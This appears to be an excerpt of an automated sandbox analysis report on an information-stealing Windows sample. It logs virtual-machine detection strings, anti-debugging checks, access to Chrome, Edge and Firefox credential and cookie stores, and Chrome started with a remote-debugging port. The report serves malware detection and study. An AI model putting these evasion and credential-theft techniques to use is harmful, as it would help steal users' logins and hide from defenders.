Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: Amcache.hve.12.dr Binary or memory string: VMware
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000003.00000002.2395711536.0000025DCEA9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B38230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 7_2_00B38230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B3116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 7_2_00B3116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B311A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 7_2_00B311A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B31160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 7_2_00B31160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B313C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 7_2_00B313C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2684D0 cpuid 7_2_6C2684D0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 7.2.service123.exe.6c1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7580, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality

Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP